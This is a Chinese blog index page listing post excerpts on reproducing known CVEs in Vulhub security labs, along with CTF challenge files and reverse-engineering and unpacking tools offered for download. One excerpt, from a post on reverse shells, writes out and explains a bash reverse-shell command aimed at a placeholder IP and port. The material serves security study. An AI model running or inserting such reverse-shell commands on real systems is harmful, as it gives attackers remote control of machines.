自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(55)
  • 资源 (30)
  • 收藏
  • 关注

转载 利用Vulnhub复现漏洞 - Nginx 配置错误导致漏洞

Nginx 配置错误导致漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现nginx.confMistake 1\. CRLF注入漏洞Mistake 2\. 目录穿越漏洞Mistake 3\. add_header被覆盖Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/insecure-configuration/漏洞原理...

2019-07-15 16:53:55 1080

原创 利用Vulnhub复现漏洞 - Nginx越界读取缓存漏洞(CVE-2017-7529)

Nginx越界读取缓存漏洞(CVE-2017-7529)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/CVE-2017-7529/漏洞原理Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP...

2019-07-15 11:03:23 2867

原创 利用Vulnhub复现漏洞 - Nginx 文件名逻辑漏洞(CVE-2013-4547)

Nginx 文件名逻辑漏洞(CVE-2013-4547)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/nginx/CVE-2013-4547/漏洞原理影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7参考链接:http://cve.mitre.or...

2019-07-12 18:00:38 848

原创 利用Vulnhub复现漏洞 - Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发送请求Vulnhub官方复现教程https://vulhub.org/#/environments/nexus/CVE-2019-7238/漏洞原理Nexus Repository Manage...

2019-07-12 16:55:21 2472 1

原创 利用Vulnhub复现漏洞 - Mysql 身份认证绕过漏洞(CVE-2012-2122)

Mysql 身份认证绕过漏洞(CVE-2012-2122)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/mysql/CVE-2012-2122/漏洞原理当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也...

2019-07-12 16:34:18 2662

原创 利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)

mini_httpd任意文件读取漏洞(CVE-2018-18778)Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/漏洞原理Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下...

2019-07-12 16:26:04 1972

原创 利用Vulnhub复现漏洞 - Magento 2.2 SQL注入漏洞

Magento 2.2 SQL注入漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现登录管理员账号使用POC读取管理员的session原理理解端口设置浏览器设置BurpSuit设置Vulnhub官方复现教程https://vulhub.org/#/environments/magento/2.2-sqli/漏洞原理Magento(麦进斗)是一款新的专业开源电子商务平台,采用ph...

2019-07-12 16:12:52 2502

原创 利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/log4j/CVE-2017-5645/漏洞原理Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log...

2019-07-12 14:02:25 6124 1

原创 利用Vulnhub复现漏洞 - libssh 服务端权限认证绕过漏洞(CVE-2018-10933)

libssh 服务端权限认证绕过漏洞(CVE-2018-10933)Vulnhub官方复现教程漏洞原理复现过程启动环境PoC (pocsuite 插件)执行任意命令Vulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md漏洞原理libssh是一个提供ssh相...

2019-07-12 13:38:16 1895

原创 利用Vulnhub复现漏洞 - Jupyter Notebook 未授权访问漏洞

Jupyter Notebook 未授权访问漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现我滴个神呀Vulnhub官方复现教程https://vulhub.org/#/environments/jupyter/notebook-rce/漏洞原理Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。...

2019-07-12 11:11:23 2220

原创 利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

@[TOC](Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境)Vulnhub官方复现教程https://vulhub.org/#/environments/joomla/CVE-2017-8917/漏洞原理com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何...

2019-07-12 10:51:35 4050

原创 利用Vulnhub复现漏洞 - Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现并未成功POCVulnhub官方复现教程https://vulhub.org/#/environments/joomla/CVE-2015-8562/漏洞原理本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而...

2019-07-11 18:01:50 2532

原创 利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果Vulnhub官方复现教程https://vulhub.org/#/environments/jmeter/CVE-2018-1297/漏洞原理Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...

2019-07-11 17:04:03 2447

原创 利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)

Jenkins远程命令执行漏洞(CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验Vulnhub官方复现教程https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/漏洞原理Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...

2019-07-11 16:51:22 4501

原创 利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现生成序列化字符串发送数据包,执行命令检验Vulnhub官方复现教程https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/漏洞原理参考阅读 https://blogs.securiteam.com/...

2019-07-11 16:00:46 2277 4

原创 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现发送POC通过命令通过`BurpSuit`发送检测POC是否成功Vulnhub官方复现教程https://vulhub.org/#/environments/jboss/CVE-2017-7504/漏洞原理Red Hat JBoss Applica...

2019-07-11 14:19:14 1796

原创 Linux下的渗透命令学习 - 反弹Shell

反弹ShellShell最常见命令和原理监听命令Shell最常见命令和原理bash -i >& /dev/tcp/ip/port 0>&1bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&amp...

2019-07-11 10:25:46 556

原创 反序列化工具ysoserial生成的payload无效 | 请使用CMD生成POC

ysoserial请使用CMD生成POCPOC文件Powershell下的POC文件CMD下的POC文件不同处在复现利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞时,完全按步骤操作,但是POC一直不能成功执行以为是HTTP请求头/命令有问题,一直试一直改,包括生成POC的命令,因为ysoserial的参数CommonsCollections有的是1...

2019-07-10 18:02:53 1685 2

原创 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

JBoss JMXInvokerServlet 反序列化漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境端口设置浏览器设置BurpSuit设置复现漏洞序列化数据生成发送POCEXPVulnhub官方复现教程https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/漏洞原理这是经典的JBoss反序...

2019-07-10 17:54:36 3058 7

原创 利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)

Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485Vulnhub官方复现教程https://vulhub.org/#/environments/jackson/CVE-2017-7525/漏洞原理Jackson-da...

2019-07-10 15:00:08 8330 1

原创 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)

Imagetragick 命令执行漏洞(CVE-2016–3714)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置上传POC反弹shell POCVulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md漏...

2019-07-10 14:44:56 1909

原创 利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)

HTTPoxy漏洞(CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求Vulnhub官方复现教程https://vulhub.org/#/environments/cgi/httpoxy/漏洞原理参考:http://www.laruence.com/2016/07/19/3101.html简单来说,根据RF...

2019-07-09 18:03:25 2341 3

原创 利用Vulnhub复现漏洞 - 心脏出血漏洞(CVE-2014-0160)

心脏出血漏洞(CVE-2014-0160)Vulnhub官方复现教程复现过程启动环境漏洞复现ssltest.pyVulnhub官方复现教程https://github.com/vulhub/vulhub/blob/master/openssl/heartbleed/README.zh-cn.md复现过程启动环境https://blog.csdn.net/JiangBuLiu/articl...

2019-07-09 16:45:32 2296 1

原创 利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)

OpenSSH 用户名枚举漏洞(CVE-2018-15473)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现CVE-2018-15473-ExploitVulnhub官方复现教程https://vulhub.org/#/environments/openssh/CVE-2018-15473/漏洞原理OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用...

2019-07-09 16:00:38 7885 3

原创 利用Vulnhub复现漏洞 - Hadoop YARN ResourceManager 未授权访问

Hadoop YARN ResourceManager 未授权访问Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现EXPVulnhub官方复现教程https://vulhub.org/#/environments/hadoop/unauthorized-yarn/漏洞原理http://archive.hack.lu/2016/Wavestone - Hack.lu 2016 - ...

2019-07-09 15:26:29 2484

原创 利用Vulnhub复现漏洞 - GoAhead 远程命令执行漏洞(CVE-2017-17562)

GoAhead 远程命令执行漏洞(CVE-2017-17562)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现动态链接库源码编译so文件发送payloadVulnhub官方复现教程https://vulhub.org/#/environments/goahead/CVE-2017-17562/漏洞原理GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行...

2019-07-09 11:48:35 1211

原创 利用Vulnhub复现漏洞 - Gogs 任意用户登录漏洞(CVE-2018-18925)

Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程【https://vulhub.org/#/environments/httpd/ssi-rce/】漏洞原理【】复现漏洞启动环境https://blog.csdn.net/JiangBuLiu/article/details/93853056进入路径为cd /...

2019-07-08 18:04:38 4338 3

原创 利用Vulnhub复现漏洞 - Gitlist 0.6.0 远程命令执行漏洞

gitlist 0.6.0 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现端口拦截发送数据包:Vulnhub官方复现教程【https://vulhub.org/#/environments/httpd/ssi-rce/】漏洞原理在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令:public function searchTree($q...

2019-07-08 17:48:42 818

原创 利用Vulnhub复现漏洞 - Gitlab 任意文件读取漏洞(CVE-2016-9086)

Gitlab 任意文件读取漏洞(CVE-2016-9086)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/gitlab/CVE-2016-9086/漏洞原理Gitlab版本:8.13.1原理剖析:http://paper.seebug.org/104/复现漏洞启动环境https...

2019-07-08 17:32:49 3329

原创 利用Vulnhub复现漏洞 - Gitea 1.4.0 目录穿越导致命令执行漏洞

Gitea 1.4.0 目录穿越导致命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现设置浏览器的代理端口为3000BurpVulnhub官方复现教程https://vulhub.org/#/environments/gitea/1.4-rce/漏洞原理其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。参考链接:htt...

2019-07-08 16:35:01 912

原创 利用Vulnhub复现漏洞 - GIT-SHELL 沙盒绕过(CVE-2017-8386)

GIT-SHELL 沙盒绕过(CVE-2017-8386)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现原理基于ssh协议的git拉取流程如何禁止git用户执行系统shellgit-shell 沙盒绕过漏洞(CVE-2017-8386)通过ssh进行利用一些限制Vulnhub官方复现教程https://vulhub.org/#/environments/git/CVE-2017-8...

2019-07-08 15:53:17 1003

原创 利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC文件检测是否成功Vulnhub官方复现教程https://vulhub.org/#/environments/ghostscript/CVE-2019-6116/漏洞原理GhostScript 被许多图片处理库所使用,如 ImageMagi...

2019-07-08 15:47:04 1861

原创 利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POCVulnhub官方复现教程https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/漏洞原理GhostScript 被许多图片处理库所使用,如 ImageMagick、Pyt...

2019-07-08 15:25:36 2037

原创 利用Vulnhub复现漏洞 - PHP-FPM Fastcgi 未授权访问漏洞

PHP-FPM Fastcgi 未授权访问漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现EXP测试EXP由于访问非*.PHP文件,所以返回结果403使用命令执行一个默认存在的php文件任意命令执行复现Vulnhub官方复现教程https://vulhub.org/#/environments/fpm/漏洞原理https://www.leavesongs.com/PENETR...

2019-07-08 15:05:42 2367

原创 利用Vulnhub复现漏洞 - Flask(Jinja2) 服务端模板注入漏洞

Flask(Jinja2) 服务端模板注入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/flask/ssti/漏洞原理https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-In...

2019-07-08 14:21:58 1131

原创 利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞环境

ffmpeg 任意文件读取漏洞环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境x509: certificate has expired or is not yet valid漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/ffmpeg/phdays/漏洞原理FFmpeg可以处理HLS播放列表的特性,而播放列表可以引用外部文件。...

2019-07-05 17:40:22 1053 2

原创 Linux命令学习 - Ntpdate

Ntpdate命令简介安装网络时间同步命令修改crontab文件添加或修改定时任务语法参数命令简介ntpdate 使用网络计时协议(NTP)设置日期和时间。此命令仅应用于 AIX 4.2 或后期版本。通过轮询指定的确定正确时间的 NTP 服务器, ntpdate 命令设置本地日期和时间。它从指定的每个服务器获得了一些样本,并应用标准 NTP 时钟过滤器和选择算法来选择最好的样本。安装ap...

2019-07-05 16:57:35 1636

原创 利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)

ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现Vulnhub官方复现教程https://vulhub.org/#/environments/ffmpeg/CVE-2016-1897/漏洞原理在FFMpeg2.X 由于在解析HTTP Live Streaming流媒体m3u8文...

2019-07-05 16:19:52 2224 8

原创 解混淆/脱壳工具 - De4dot

De4dot参数详解OptionsFile optionsDeobfuscator options语法例子使用查壳dnspy脱壳运行软件脱壳后查壳脱壳后dnspy参数详解由于吾爱破解有比较详细的,放个链接https://www.52pojie.cn/thread-762674-1-1.html下载链接https://download.csdn.net/download/jiangbuli...

2019-07-05 13:32:25 16598

原创 利用Vulnhub复现漏洞 - Fastjson 反序列化导致任意命令执行漏洞

Fastjson 反序列化导致任意命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境生成字节码本环境目录结构解压war漏洞复现生成字节码构造POC漏洞利用本地测试Vulnhub官方复现教程https://vulhub.org/#/environments/fastjson/vuln/漏洞原理http://xxlegend.com/2017/04/29/title-%20fas...

2019-07-03 16:06:11 9102

【XCTF-Mobile】新手练习区-11-你是谁.rar

题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5096&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/who_r_u

2021-09-01

【XCTF-Mobile】新手练习区-12.rar

题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind

2021-09-01

【XCTF-Mobile】新手练习区-10-RememberOther.rar

题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5094&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/rememberother

2021-09-01

【XCTF-Mobile】新手练习区-09-Ph0en1x-100.rar

题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5093&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ph0en1x_100

2021-08-31

【XCTF-Mobile】新手练习区-08-app3.rar

题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5087&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/app3

2021-08-30

android-studio-2020.3.1.23-windows.exe

2020.3.1 for Windows 64-bit (912 MiB) 仅为了方便国内朋友下载,文件来自:https://developer.android.com/studio

2021-08-20

jadx-gui-1.2.0.125-2d9bcdb8-no-jre-win.exe.zip

jadx-gui-1.2.0.125-2d9bcdb8-no-jre-win.exe.zip GitHub:https://github.com/skylot/jadx 下载链接:https://nightly.link/skylot/jadx/workflows/build/master

2021-08-17

【XCTF-Mobile】新手练习区-02-easy-dex.apk

题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5089&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easydex

2021-08-16

【XCTF-Mobile】新手练习区-05-easyjni.apk

题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjni

2021-08-05

Snipaste-2.6.4-Beta-x64.zip

来源自官网:https://zh.snipaste.com/

2021-08-04

【XCTF-Mobile】新手练习区-04-easyjava.apk

题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjava

2021-08-04

【XCTF-Mobile】新手练习区-01-easy-apk.apk

题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyapk

2021-08-04

【XCTF-RE】新手练习区-maze

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py

2021-08-03

【XCTF-RE】新手练习区-csaw2013reversing2.exe

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g

2021-08-03

【XCTF-RE】新手练习区-getit

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/aba4sn

2021-08-03

【XCTF-RE】新手练习区-no-strings-attached-解压密码:十三陵陈飞宇.rar

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/qffkcv

2021-08-03

【XCTF-RE】新手练习区-logmein

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60

2021-08-03

【XCTF-RE】新手练习区-simple-unpack

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8

2021-08-03

【XCTF-RE】新手练习区-re1.exe

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy

2021-08-03

【XCTF-RE】新手练习区-open-source.c

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7

2021-08-03

【XCTF-RE】新手练习区-Hello, CTF.exe

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b

2021-08-03

【XCTF-RE】新手练习区-insanity

题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm

2021-08-03

jdk-8u301-windows-x64-解压密码:十三陵陈飞宇.rar

一直提示资源已存在,我就加密压缩了,解压密码:十三陵陈飞宇 JDK 8-301 64位 https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html

2021-08-02

jdk-8u301-windows-i586.exe

JDK 8-301 32位 https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html

2021-08-02

dextojar.rar

Android逆向

2021-07-27

HW溯源手册V2.0.pdf

来源网络,感谢作者!

2021-03-24

Themida脱壳.rar

Themida脱壳脚本:https://www.52pojie.cn/thread-290732-1-1.html

2020-07-20

GetLastError.xlsx

GetLastError的返回值,十进制,十六进制,宏定义,中文解释 如有遗失或者错误,请理解 参考链接:https://docs.microsoft.com/en-us/previous-versions/aa911366(v=msdn.10)?redirectedfrom=MSDN

2019-12-16

IDA.Pro.v7.2 - Part2.rar

以上材料仅供学习交流使用,严禁用于任何商业目的和途径。 WIN7的32位系统只能安装IDA6.8,64位可以安装V7+ 由于文件大小限制,Part1为:x64_idapronw_hexx64w_181105_de455c480e11ef1ec91473028f4dd175.exe Part2为:IDAPRO7.2_ESET_KEY.key+hexrays_sdk+idasdk72

2019-07-05

de4dot-Reactor5.0 By ddk313.rar

有一些软件其中可能是拖壳不干净,但是程序脱壳后,能够运行的话,分析基本都是明码了,加壳的部分应该不影响程序源码的分析。 使用方式可参考:https://blog.csdn.net/JiangBuLiu/article/details/94721590 GitHub下载地址:https://github.com/0xd4d/de4dot

2019-07-05

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除